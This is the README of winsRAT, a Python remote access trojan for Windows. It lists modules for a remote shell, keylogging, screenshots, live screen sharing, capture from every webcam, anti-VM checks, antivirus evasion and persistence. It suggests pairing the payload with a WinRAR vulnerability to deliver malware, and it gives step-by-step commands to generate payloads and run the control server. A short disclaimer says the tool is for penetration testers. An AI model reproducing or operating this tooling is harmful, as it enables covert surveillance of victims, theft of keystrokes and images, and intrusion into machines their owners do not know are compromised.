winsRAT is written entirely in Python, developed from SillyRAT. winsRAT is a RAT specifically for Windows operating systems and has additional features. Server.py can generate two types of files: .exe files and source files.
This code shows the features of the tool.
def help_c_current(self):
headers = (pull.BOLD + 'Command' + pull.END, pull.BOLD + 'Description' + pull.END)
lister = [
('help', 'Shows manual for commands'),
('sessions', 'Show all connected clients to the server'),
('connect', 'Connect to a Specific Client'),
('disconnect', 'Disconnect from Current Client'),
('clear', 'Clear Screen'),
('shell' , 'Launch a New Terminal/Shell.'),
('keylogger', 'KeyLogger Module'),
('sysinfo', 'Dump System, Processor, CPU and Network Information'),
('screenshot', 'Take Screenshot on Target Machine and Save on Local'),
('screenshare' , 'Take Screenshot on Target Machine and Share in Real Time'),
('webcam', 'Capture Webcam Image and Save on Local'),
('antivm' , 'Check if the target is a VM to change the behavior of winsRAT.'),
('exit', 'Exit from winsRAT!')
]- And others, stay tuned.
- Avoid AV
- The payload is base64 encoded.
- The webcam module is developed to capture images of multiple devices on the connected target machine. For example, if the target machine has 5 webcams, this module will capture images of all 5 devices immediately when using the webcam command on the server.
- Reconnecting to increase retention
- RAT behavior changes when encountering a VM target (under development)
- You can make the compiled exe file work with the CVE-2025-8088 vulnerability. In terms of winrar vulnerability, when you use it with this vulnerability, it elevates the tool to a full Malware Delivery Chain.
- And others, stay tuned.
The tool is tested on Windows with Python 3.13.4. Follow the steps for installation:
git clone https://github.com/ThemeHackers/winsRAT
cd winsRAT/
pip3 install -r requirements.txt
You can get the payload file in two ways:
- Source File
- Compiled File
Source file
python3 server.py generate -a server_ip -p server_port -o "C:\Users\{...}\Downloads\{name_output}" -s -per
python3 server.py generate -a 192.168.1.100 -p 9001 -o "C:\Users\1com3456\Downloads\winsrat" -s -perCompiled file
python3 server.py generate -a server_ip -p server_port -o "C:\Users\{...}\Downloads\{name_output}" -per
python3 server.py generate -a 192.168.1.100 -p 9001 -o "C:\Users\1com3456\Downloads\winsrat" -perReplace your IP Address and Port on above commands.
The server must be executed on Windows. You can buy a VPS or Cloud Server for connections. For the record, the server doesn't store any session from last run. So, all the progress will lost once the server application gets terminated. Running your server:
python3 server.py bind -a 0.0.0.0 -p 9001All the connections will be listed under sessions command:
$ sessions
You can connect to you target session with connect command and launch one of available commands:
$ connect ID
$ keylogger on
$ keylogger dump
$ screenshot
Get a list of available commands:
$ help
Help on a Specific Command:
$ help COMMAND
Twitter: @hash3liZer
Discord: TheFlash2k#0407
Instagram: _tthemzdl5678
Github: ThemeHackers
This tool is only for use by penetration testers or security testers. The author is not responsible for any illegal actions in your country.